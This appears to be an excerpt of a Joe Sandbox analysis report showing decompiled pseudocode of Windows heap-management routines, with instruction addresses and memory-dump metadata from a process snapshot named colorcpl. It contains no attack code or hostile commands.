                                                                                                								if( *(_t357 + 0xc) == 0) {
                                                                                                									_push("HEAP: ");
                                                                                                									E06E1B150();
                                                                                                								} else {
                                                                                                									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                								}
                                                                                                								_push(_v20 + 0x10 + _t419);
                                                                                                								E06E1B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                                                                                								_t271 =  *[fs:0x30];
                                                                                                								_t421 = _t421 + 0xc;
                                                                                                								__eflags =  *((char*)(_t271 + 2));
                                                                                                								if( *((char*)(_t271 + 2)) != 0) {
                                                                                                									 *0x6f06378 = 1;
                                                                                                									asm("int3");
                                                                                                									 *0x6f06378 = 0;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						_t381 = _a4;
                                                                                                						_t414 = _t419;
                                                                                                						_t419[1] = 0;
                                                                                                						_t419[3] = 0;
                                                                                                						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                                                                                						 *_t419 =  *_t381;
                                                                                                						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                                                                                						L4:
                                                                                                						_t420 = _t414 +  *_t381 * 8;
                                                                                                						if( *(_t307 + 0x4c) == 0) {
                                                                                                							L6:
                                                                                                							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                                                                                                								__eflags =  *(_t307 + 0x4c);
                                                                                                								if( *(_t307 + 0x4c) != 0) {
                                                                                                									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                                                                                									 *_t420 = _t390;
                                                                                                									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                                                                                									__eflags = _t390 >> 0x18 - _t328;
                                                                                                									if(__eflags != 0) {
                                                                                                										_push(_t328);
                                                                                                										E06ECFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                                                                                									}
                                                                                                								}
                                                                                                								__eflags = _v5;
                                                                                                								if(_v5 == 0) {
                                                                                                									L94:
                                                                                                									_t382 = _t420[3];
                                                                                                									_t137 =  &(_t420[2]); // -16
                                                                                                									_t309 = _t137;
                                                                                                									_t186 =  *_t309;
                                                                                                									_v20 = _t186;
                                                                                                									_v16 = _t382;
                                                                                                									_t187 =  *((intOrPtr*)(_t186 + 4));
                                                                                                									__eflags =  *_t382 - _t187;
                                                                                                									if( *_t382 != _t187) {
                                                                                                										L63:
                                                                                                										_push(_t309);
                                                                                                										_push( *_t382);
                                                                                                										_push(_t187);
                                                                                                										_push(_t309);
                                                                                                										_push(0xd);
                                                                                                										L64:
                                                                                                										E06EDA80D(_t307);
                                                                                                										continue;
                                                                                                									}
                                                                                                									__eflags =  *_t382 - _t309;
                                                                                                									if( *_t382 != _t309) {
                                                                                                										goto L63;
                                                                                                									}
                                                                                                									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                                                                                									_t393 =  *(_t307 + 0xb4);
                                                                                                									__eflags = _t393;
                                                                                                									if(_t393 == 0) {
                                                                                                										L104:
                                                                                                										_t330 = _v16;
                                                                                                										_t190 = _v20;
                                                                                                										 *_t330 = _t190;
                                                                                                										 *(_t190 + 4) = _t330;
                                                                                                										__eflags = _t420[0] & 0x00000008;
                                                                                                										if((_t420[0] & 0x00000008) == 0) {
                                                                                                											L107:
                                                                                                											_t331 = _t420[0];
                                                                                                											__eflags = _t331 & 0x00000004;
                                                                                                											if((_t331 & 0x00000004) != 0) {
                                                                                                												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                                                                                												_v12 = _t196;
                                                                                                												__eflags = _t331 & 0x00000002;
                                                                                                												if((_t331 & 0x00000002) != 0) {
                                                                                                													__eflags = _t196 - 4;
                                                                                                													if(_t196 > 4) {
                                                                                                														_t196 = _t196 - 4;
                                                                                                														__eflags = _t196;
                                                                                                														_v12 = _t196;
                                                                                                													}
                                                                                                												}
                                                                                                												_t162 =  &(_t420[4]); // -8
                                                                                                												_t197 = E06E6D540(_t162, _t196, 0xfeeefeee);
                                                                                                												_v20 = _t197;
                                                                                                												__eflags = _t197 - _v12;
                                                                                                												if(_t197 != _v12) {
                                                                                                													_t335 =  *[fs:0x30];
                                                                                                													__eflags =  *(_t335 + 0xc);
                                                                                                													if( *(_t335 + 0xc) == 0) {
                                                                                                														_push("HEAP: ");
                                                                                                														E06E1B150();
                                                                                                													} else {
                                                                                                														E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                													}
                                                                                                													_push(_v20 + 0x10 + _t420);
                                                                                                													E06E1B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                                                                                													_t203 =  *[fs:0x30];
                                                                                                													__eflags =  *((char*)(_t203 + 2));
                                                                                                													if( *((char*)(_t203 + 2)) != 0) {
                                                                                                														 *0x6f06378 = 1;
                                                                                                														asm("int3");
                                                                                                														 *0x6f06378 = 0;
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                											_t394 = _a4;
                                                                                                											_t414[1] = 0;
                                                                                                											_t414[3] = 0;
                                                                                                											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                                                                                                											 *_t414 =  *_t394;
                                                                                                											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                                                                                											break;
                                                                                                										}
                                                                                                										_t207 = E06E3A229(_t307, _t420);
                                                                                                										__eflags = _t207;
                                                                                                										if(_t207 != 0) {
                                                                                                											goto L107;
                                                                                                										}
                                                                                                										E06E3A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                                                                                										continue;
                                                                                                									}
                                                                                                									_t342 =  *_t420 & 0x0000ffff;
                                                                                                									while(1) {
                                                                                                										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                                                                                										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                                                                                											break;
                                                                                                										}
                                                                                                										_t210 =  *_t393;
                                                                                                										__eflags = _t210;
                                                                                                										if(_t210 == 0) {
                                                                                                											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                                                                											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                                                                											L103:
                                                                                                											_t146 =  &(_t420[2]); // -16
                                                                                                											E06E3BC04(_t307, _t393, 1, _t146, _t212, _t342);
                                                                                                											goto L104;
                                                                                                										}
                                                                                                										_t393 = _t210;
                                                                                                									}
                                                                                                									_t212 = _t342;
                                                                                                									goto L103;
                                                                                                								} else {
                                                                                                									_t384 = _t414[6];
                                                                                                									_t102 =  &(_t414[4]); // -16
                                                                                                									_t311 = _t102;
                                                                                                									_t215 =  *_t311;
                                                                                                									_v20 = _t215;
                                                                                                									_v16 = _t384;
                                                                                                									_t216 =  *((intOrPtr*)(_t215 + 4));
                                                                                                									__eflags =  *_t384 - _t216;
                                                                                                									if( *_t384 != _t216) {
                                                                                                										L92:
                                                                                                										_push(_t311);
                                                                                                										_push( *_t384);
                                                                                                										E06EDA80D(_t307, 0xd, _t311, _t216);
                                                                                                										L93:
                                                                                                										_v5 = 0;
                                                                                                										goto L94;
                                                                                                									}
                                                                                                									__eflags =  *_t384 - _t311;
                                                                                                									if( *_t384 != _t311) {
                                                                                                										goto L92;
                                                                                                									}
                                                                                                									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                                                                									_t386 =  *(_t307 + 0xb4);
                                                                                                									__eflags = _t386;
                                                                                                									if(_t386 == 0) {
                                                                                                										L79:
                                                                                                										_t313 = _v16;
                                                                                                										_t219 = _v20;
                                                                                                										 *_t313 = _t219;
                                                                                                										 *(_t219 + 4) = _t313;
                                                                                                										__eflags = _t414[1] & 0x00000008;
                                                                                                										if((_t414[1] & 0x00000008) == 0) {
                                                                                                											L82:
                                                                                                											_t314 = _t414[1];
                                                                                                											__eflags = _t314 & 0x00000004;
                                                                                                											if((_t314 & 0x00000004) != 0) {
                                                                                                												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                                                                												_v12 = _t221;
                                                                                                												__eflags = _t314 & 0x00000002;
                                                                                                												if((_t314 & 0x00000002) != 0) {
                                                                                                													__eflags = _t221 - 4;
                                                                                                													if(_t221 > 4) {
                                                                                                														_t221 = _t221 - 4;
                                                                                                														__eflags = _t221;
                                                                                                														_v12 = _t221;
                                                                                                													}
                                                                                                												}
                                                                                                												_t127 =  &(_t414[8]); // -8
                                                                                                												_t222 = E06E6D540(_t127, _t221, 0xfeeefeee);
                                                                                                												_v20 = _t222;
                                                                                                												__eflags = _t222 - _v12;
                                                                                                												if(_t222 != _v12) {
                                                                                                													_t316 =  *[fs:0x30];
                                                                                                													__eflags =  *(_t316 + 0xc);
                                                                                                													if( *(_t316 + 0xc) == 0) {
                                                                                                														_push("HEAP: ");
                                                                                                														E06E1B150();
                                                                                                													} else {
                                                                                                														E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                													}
                                                                                                													_push(_v20 + 0x10 + _t414);
                                                                                                													E06E1B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                                                                													_t228 =  *[fs:0x30];
                                                                                                													_t421 = _t421 + 0xc;
                                                                                                													__eflags =  *((char*)(_t228 + 2));
                                                                                                													if( *((char*)(_t228 + 2)) != 0) {
                                                                                                														 *0x6f06378 = 1;
                                                                                                														asm("int3");
                                                                                                														 *0x6f06378 = 0;
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                											goto L93;
                                                                                                										}
                                                                                                										_t232 = E06E3A229(_t307, _t414);
                                                                                                										__eflags = _t232;
                                                                                                										if(_t232 != 0) {
                                                                                                											goto L82;
                                                                                                										}
                                                                                                										E06E3A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                                                                										goto L93;
                                                                                                									}
                                                                                                									_t323 =  *_t414 & 0x0000ffff;
                                                                                                									while(1) {
                                                                                                										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                                                                                										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                                                                                											break;
                                                                                                										}
                                                                                                										_t235 =  *_t386;
                                                                                                										__eflags = _t235;
                                                                                                										if(_t235 == 0) {
                                                                                                											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                                                                											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                                                                											L78:
                                                                                                											_t111 =  &(_t414[4]); // -16
                                                                                                											E06E3BC04(_t307, _t386, 1, _t111, _t237, _t323);
                                                                                                											goto L79;
                                                                                                										}
                                                                                                										_t386 = _t235;
                                                                                                									}
                                                                                                									_t237 = _t323;
                                                                                                									goto L78;
                                                                                                								}
                                                                                                							}
                                                                                                							return _t414;
                                                                                                						}
                                                                                                						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                                                                                						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                                                                                						if(_t398 >> 0x18 != _t347) {
                                                                                                							_push(_t347);
                                                                                                							_push(0);
                                                                                                							_push(0);
                                                                                                							_push(_t420);
                                                                                                							_push(3);
                                                                                                							goto L64;
                                                                                                						}
                                                                                                						goto L6;
                                                                                                					} else {
                                                                                                						_t277 =  *_t419 & 0x0000ffff;
                                                                                                						_v16 = _t277;
                                                                                                						while(1) {
                                                                                                							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                                                                                							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t279 =  *_t404;
                                                                                                							__eflags = _t279;
                                                                                                							if(_t279 == 0) {
                                                                                                								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                                                                								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                                                                								break;
                                                                                                							} else {
                                                                                                								_t404 = _t279;
                                                                                                								_t277 =  *_t419 & 0x0000ffff;
                                                                                                								continue;
                                                                                                							}
                                                                                                						}
                                                                                                						E06E3BC04(_t307, _t404, 1, _t350, _t277, _v16);
                                                                                                						goto L20;
                                                                                                					}
                                                                                                				}
                                                                                                			}
                                                                                                0x06e816a5
                                                                                                0x06e816a9
                                                                                                0x06e816b5
                                                                                                0x06e816ba
                                                                                                0x06e816bc
                                                                                                0x06e816be
                                                                                                0x06e816c3
                                                                                                0x06e816c3
                                                                                                0x06e816bc
                                                                                                0x06e816c8
                                                                                                0x06e816cc
                                                                                                0x06e8181b
                                                                                                0x06e8181b
                                                                                                0x06e8181e
                                                                                                0x06e8181e
                                                                                                0x06e81821
                                                                                                0x06e81823
                                                                                                0x06e81826
                                                                                                0x06e81829
                                                                                                0x06e8182c
                                                                                                0x06e8182e
                                                                                                0x06e81688
                                                                                                0x06e81688
                                                                                                0x06e81689
                                                                                                0x06e8168b
                                                                                                0x06e8168c
                                                                                                0x06e8168d
                                                                                                0x06e8168f
                                                                                                0x06e81692
                                                                                                0x00000000
                                                                                                0x06e81692
                                                                                                0x06e81834
                                                                                                0x06e81836
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8183f
                                                                                                0x06e81842
                                                                                                0x06e81848
                                                                                                0x06e8184a
                                                                                                0x06e81875
                                                                                                0x06e81875
                                                                                                0x06e81878
                                                                                                0x06e8187b
                                                                                                0x06e8187d
                                                                                                0x06e81880
                                                                                                0x06e81884
                                                                                                0x06e818a7
                                                                                                0x06e818a7
                                                                                                0x06e818aa
                                                                                                0x06e818ad
                                                                                                0x06e818b6
                                                                                                0x06e818bd
                                                                                                0x06e818c0
                                                                                                0x06e818c3
                                                                                                0x06e818c5
                                                                                                0x06e818c8
                                                                                                0x06e818ca
                                                                                                0x06e818ca
                                                                                                0x06e818cd
                                                                                                0x06e818cd
                                                                                                0x06e818c8
                                                                                                0x06e818d5
                                                                                                0x06e818da
                                                                                                0x06e818df
                                                                                                0x06e818e2
                                                                                                0x06e818e5
                                                                                                0x06e818e7
                                                                                                0x06e818ee
                                                                                                0x06e818f2
                                                                                                0x06e81912
                                                                                                0x06e81917
                                                                                                0x06e818f4
                                                                                                0x06e8190a
                                                                                                0x06e8190f
                                                                                                0x06e81925
                                                                                                0x06e8192c
                                                                                                0x06e81931
                                                                                                0x06e8193a
                                                                                                0x06e8193e
                                                                                                0x06e81940
                                                                                                0x06e81947
                                                                                                0x06e81948
                                                                                                0x06e81948
                                                                                                0x06e8193e
                                                                                                0x06e818e5
                                                                                                0x06e8194f
                                                                                                0x06e81952
                                                                                                0x06e81956
                                                                                                0x06e8195d
                                                                                                0x06e81961
                                                                                                0x06e8196d
                                                                                                0x00000000
                                                                                                0x06e8196d
                                                                                                0x06e8188a
                                                                                                0x06e8188f
                                                                                                0x06e81891
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8189d
                                                                                                0x00000000
                                                                                                0x06e8189d
                                                                                                0x06e8184c
                                                                                                0x06e81859
                                                                                                0x06e81859
                                                                                                0x06e8185c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e81851
                                                                                                0x06e81853
                                                                                                0x06e81855
                                                                                                0x06e81865
                                                                                                0x06e81865
                                                                                                0x06e81866
                                                                                                0x06e81868
                                                                                                0x06e81870
                                                                                                0x00000000
                                                                                                0x06e81870
                                                                                                0x06e81857
                                                                                                0x06e81857
                                                                                                0x06e8185e
                                                                                                0x00000000
                                                                                                0x06e816d2
                                                                                                0x06e816d2
                                                                                                0x06e816d5
                                                                                                0x06e816d5
                                                                                                0x06e816d8
                                                                                                0x06e816da
                                                                                                0x06e816dd
                                                                                                0x06e816e0
                                                                                                0x06e816e3
                                                                                                0x06e816e5
                                                                                                0x06e81808
                                                                                                0x06e81808
                                                                                                0x06e81809
                                                                                                0x06e81812
                                                                                                0x06e81817
                                                                                                0x06e81817
                                                                                                0x00000000
                                                                                                0x06e81817
                                                                                                0x06e816eb
                                                                                                0x06e816ed
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e816f6
                                                                                                0x06e816f9
                                                                                                0x06e816ff
                                                                                                0x06e81701
                                                                                                0x06e8172c
                                                                                                0x06e8172c
                                                                                                0x06e8172f
                                                                                                0x06e81732
                                                                                                0x06e81734
                                                                                                0x06e81737
                                                                                                0x06e8173b
                                                                                                0x06e8175e
                                                                                                0x06e8175e
                                                                                                0x06e81761
                                                                                                0x06e81764
                                                                                                0x06e8176d
                                                                                                0x06e81774
                                                                                                0x06e81777
                                                                                                0x06e8177a
                                                                                                0x06e8177c
                                                                                                0x06e8177f
                                                                                                0x06e81781
                                                                                                0x06e81781
                                                                                                0x06e81784
                                                                                                0x06e81784
                                                                                                0x06e8177f
                                                                                                0x06e8178c
                                                                                                0x06e81791
                                                                                                0x06e81796
                                                                                                0x06e81799
                                                                                                0x06e8179c
                                                                                                0x06e8179e
                                                                                                0x06e817a5
                                                                                                0x06e817a9
                                                                                                0x06e817c9
                                                                                                0x06e817ce
                                                                                                0x06e817ab
                                                                                                0x06e817c1
                                                                                                0x06e817c6
                                                                                                0x06e817dc
                                                                                                0x06e817e3
                                                                                                0x06e817e8
                                                                                                0x06e817ee
                                                                                                0x06e817f1
                                                                                                0x06e817f5
                                                                                                0x06e817f7
                                                                                                0x06e817fe
                                                                                                0x06e817ff
                                                                                                0x06e817ff
                                                                                                0x06e817f5
                                                                                                0x06e8179c
                                                                                                0x00000000
                                                                                                0x06e81764
                                                                                                0x06e81741
                                                                                                0x06e81746
                                                                                                0x06e81748
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e81754
                                                                                                0x00000000
                                                                                                0x06e81754
                                                                                                0x06e81703
                                                                                                0x06e81710
                                                                                                0x06e81710
                                                                                                0x06e81713
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e81708
                                                                                                0x06e8170a
                                                                                                0x06e8170c
                                                                                                0x06e8171c
                                                                                                0x06e8171c
                                                                                                0x06e8171d
                                                                                                0x06e8171f
                                                                                                0x06e81727
                                                                                                0x00000000
                                                                                                0x06e81727
                                                                                                0x06e8170e
                                                                                                0x06e8170e
                                                                                                0x06e81715
                                                                                                0x00000000
                                                                                                0x06e81715
                                                                                                0x06e816cc
                                                                                                0x06e39a45
                                                                                                0x06e39a45
                                                                                                0x06e39a0e
                                                                                                0x06e39a1c
                                                                                                0x06e39a23
                                                                                                0x06e8167e
                                                                                                0x06e8167f
                                                                                                0x06e81681
                                                                                                0x06e81683
                                                                                                0x06e81684
                                                                                                0x00000000
                                                                                                0x06e81684
                                                                                                0x00000000
                                                                                                0x06e39aad
                                                                                                0x06e39aad
                                                                                                0x06e39ab0
                                                                                                0x06e39ab3
                                                                                                0x06e39ab3
                                                                                                0x06e39ab6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e39ab8
                                                                                                0x06e39aba
                                                                                                0x06e39abc
                                                                                                0x06e39ac8
                                                                                                0x06e39ac8
                                                                                                0x00000000
                                                                                                0x06e39abe
                                                                                                0x06e39abe
                                                                                                0x06e39ac0
                                                                                                0x00000000
                                                                                                0x06e39ac0
                                                                                                0x06e39abc
                                                                                                0x06e39ad2
                                                                                                0x00000000
                                                                                                0x06e39ad2
                                                                                                0x06e39aab

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                • API String ID: 0-3178619729
                                                                                                • Opcode ID: 7cb35fb51084d1db32b1898d3fc47ecbad90213ce4a13ee043c8df3d03d121e7
                                                                                                • Instruction ID: 70ce33788e426b809251592e15d05c23a029b76f4fb1e66c27ec55a86b4f5676
                                                                                                • Opcode Fuzzy Hash: 7cb35fb51084d1db32b1898d3fc47ecbad90213ce4a13ee043c8df3d03d121e7
                                                                                                • Instruction Fuzzy Hash: 4C221570A003429FE7A4DF28C885BBAB7F5EF45708F149569E49E8B342E771D886CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 67%
                                                                                                			E06E3B477(signed int __ecx, signed int* __edx) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				intOrPtr* _v16;
                                                                                                				signed int* _v20;
                                                                                                				signed int _v24;
                                                                                                				char _v28;
                                                                                                				signed int _v44;
                                                                                                				char _v48;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t131;
                                                                                                				signed char _t134;
                                                                                                				signed int _t139;
                                                                                                				void* _t141;
                                                                                                				signed int* _t143;
                                                                                                				signed int* _t144;
                                                                                                				intOrPtr* _t147;
                                                                                                				char _t160;
                                                                                                				signed int* _t163;
                                                                                                				signed char* _t164;
                                                                                                				intOrPtr _t165;
                                                                                                				signed int* _t167;
                                                                                                				signed char* _t168;
                                                                                                				intOrPtr _t193;
                                                                                                				intOrPtr* _t195;
                                                                                                				signed int _t203;
                                                                                                				signed int _t209;
                                                                                                				signed int _t211;
                                                                                                				intOrPtr _t214;
                                                                                                				intOrPtr* _t231;
                                                                                                				intOrPtr* _t236;
                                                                                                				signed int _t237;
                                                                                                				intOrPtr* _t238;
                                                                                                				signed int _t240;
                                                                                                				intOrPtr _t241;
                                                                                                				char _t243;
                                                                                                				signed int _t252;
                                                                                                				signed int _t254;
                                                                                                				signed char _t259;
                                                                                                				signed int _t264;
                                                                                                				signed int _t268;
                                                                                                				intOrPtr _t277;
                                                                                                				unsigned int _t279;
                                                                                                				signed int* _t283;
                                                                                                				intOrPtr* _t284;
                                                                                                				unsigned int _t287;
                                                                                                				signed int _t291;
                                                                                                				signed int _t293;
                                                                                                
                                                                                                				_v8 =  *0x6f0d360 ^ _t293;
                                                                                                				_t223 = __edx;
                                                                                                				_v20 = __edx;
                                                                                                				_t291 = __ecx;
                                                                                                				_t276 =  *__edx;
                                                                                                				_t231 = E06E3B8E4( *__edx);
                                                                                                				_t292 = __ecx + 0x8c;
                                                                                                				_v16 = _t231;
                                                                                                				if(_t231 == __ecx + 0x8c) {
                                                                                                					L38:
                                                                                                					_t131 = 0;
                                                                                                					L34:
                                                                                                					return E06E5B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
                                                                                                				}
                                                                                                				if( *0x6f08748 >= 1) {
                                                                                                					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
                                                                                                					if(__eflags < 0) {
                                                                                                						_t214 =  *[fs:0x30];
                                                                                                						__eflags =  *(_t214 + 0xc);
                                                                                                						if( *(_t214 + 0xc) == 0) {
                                                                                                							_push("HEAP: ");
                                                                                                							E06E1B150();
                                                                                                						} else {
                                                                                                							E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                						}
                                                                                                						_push("(UCRBlock->Size >= *Size)");
                                                                                                						E06E1B150();
                                                                                                						__eflags =  *0x6f07bc8;
                                                                                                						if(__eflags == 0) {
                                                                                                							__eflags = 1;
                                                                                                							E06ED2073(_t223, 1, _t291, 1);
                                                                                                						}
                                                                                                						_t231 = _v16;
                                                                                                					}
                                                                                                				}
                                                                                                				_t5 = _t231 - 8; // -8
                                                                                                				_t292 = _t5;
                                                                                                				_t134 =  *((intOrPtr*)(_t292 + 6));
                                                                                                				if(_t134 != 0) {
                                                                                                					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                				} else {
                                                                                                					_t223 = _t291;
                                                                                                				}
                                                                                                				_t276 = _v20;
                                                                                                				_v28 =  *((intOrPtr*)(_t231 + 0x10));
                                                                                                				_t139 =  *(_t291 + 0xcc) ^  *0x6f08a68;
                                                                                                				_v12 = _t139;
                                                                                                				if(_t139 != 0) {
                                                                                                					 *0x6f0b1e0(_t291,  &_v28, _t276);
                                                                                                					_t141 = _v12();
                                                                                                					goto L8;
                                                                                                				} else {
                                                                                                					_t203 =  *((intOrPtr*)(_t231 + 0x14));
                                                                                                					_v12 = _t203;
                                                                                                					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
                                                                                                						_t264 = _v12;
                                                                                                						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
                                                                                                						if(__eflags < 0) {
                                                                                                							 *_t276 = _t264;
                                                                                                						}
                                                                                                					}
                                                                                                					_t209 =  *(_t291 + 0x40) & 0x00040000;
                                                                                                					asm("sbb ecx, ecx");
                                                                                                					_t268 = ( ~_t209 & 0x0000003c) + 4;
                                                                                                					_v12 = _t268;
                                                                                                					if(_t209 != 0) {
                                                                                                						_push(0);
                                                                                                						_push(0x14);
                                                                                                						_push( &_v48);
                                                                                                						_push(3);
                                                                                                						_push(_t291);
                                                                                                						_push(0xffffffff);
                                                                                                						_t211 = E06E59730();
                                                                                                						__eflags = _t211;
                                                                                                						if(_t211 < 0) {
                                                                                                							L56:
                                                                                                							_push(_t268);
                                                                                                							_t276 = _t291;
                                                                                                							E06EDA80D(_t291, 1, _v44, 0);
                                                                                                							_t268 = 4;
                                                                                                							goto L7;
                                                                                                						}
                                                                                                						__eflags = _v44 & 0x00000060;
                                                                                                						if((_v44 & 0x00000060) == 0) {
                                                                                                							goto L56;
                                                                                                						}
                                                                                                						__eflags = _v48 - _t291;
                                                                                                						if(__eflags != 0) {
                                                                                                							goto L56;
                                                                                                						}
                                                                                                						_t268 = _v12;
                                                                                                					}
                                                                                                					L7:
                                                                                                					_push(_t268);
                                                                                                					_push(0x1000);
                                                                                                					_push(_v20);
                                                                                                					_push(0);
                                                                                                					_push( &_v28);
                                                                                                					_push(0xffffffff);
                                                                                                					_t141 = E06E59660();
                                                                                                					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
                                                                                                					L8:
                                                                                                					if(_t141 < 0) {
                                                                                                						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
                                                                                                						goto L38;
                                                                                                					}
                                                                                                					_t143 =  *( *[fs:0x30] + 0x50);
                                                                                                					if(_t143 != 0) {
                                                                                                						__eflags =  *_t143;
                                                                                                						if(__eflags == 0) {
                                                                                                							goto L10;
                                                                                                						}
                                                                                                						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                						L11:
                                                                                                						if( *_t144 != 0) {
                                                                                                							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
                                                                                                							if(__eflags != 0) {
                                                                                                								E06ED138A(_t223, _t291, _v28,  *_v20, 2);
                                                                                                							}
                                                                                                						}
                                                                                                						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
                                                                                                							_t287 =  *(_t291 + 0x50) ^  *_t292;
                                                                                                							 *_t292 = _t287;
                                                                                                							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
                                                                                                							if(_t287 >> 0x18 != _t259) {
                                                                                                								_push(_t259);
                                                                                                								E06ECFA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
                                                                                                							}
                                                                                                						}
                                                                                                						_t147 = _v16 + 8;
                                                                                                						 *((char*)(_t292 + 2)) = 0;
                                                                                                						 *((char*)(_t292 + 7)) = 0;
                                                                                                						_t236 =  *((intOrPtr*)(_t147 + 4));
                                                                                                						_t277 =  *_t147;
                                                                                                						_v24 = _t236;
                                                                                                						_t237 =  *_t236;
                                                                                                						_v12 = _t237;
                                                                                                						_t238 = _v16;
                                                                                                						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
                                                                                                							_push(_t238);
                                                                                                							_push(_v12);
                                                                                                							E06EDA80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
                                                                                                							_t238 = _v16;
                                                                                                						} else {
                                                                                                							_t195 = _v24;
                                                                                                							 *_t195 = _t277;
                                                                                                							 *((intOrPtr*)(_t277 + 4)) = _t195;
                                                                                                						}
                                                                                                						if( *(_t238 + 0x14) == 0) {
                                                                                                							L22:
                                                                                                							_t223[0x30] = _t223[0x30] - 1;
                                                                                                							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
                                                                                                							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
                                                                                                							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
                                                                                                							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
                                                                                                							_t279 =  *(_t238 + 0x14);
                                                                                                							if(_t279 >= 0x7f000) {
                                                                                                								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
                                                                                                								_t279 =  *(_t238 + 0x14);
                                                                                                							}
                                                                                                							_t152 = _v20;
                                                                                                							_t240 =  *_v20;
                                                                                                							_v12 = _t240;
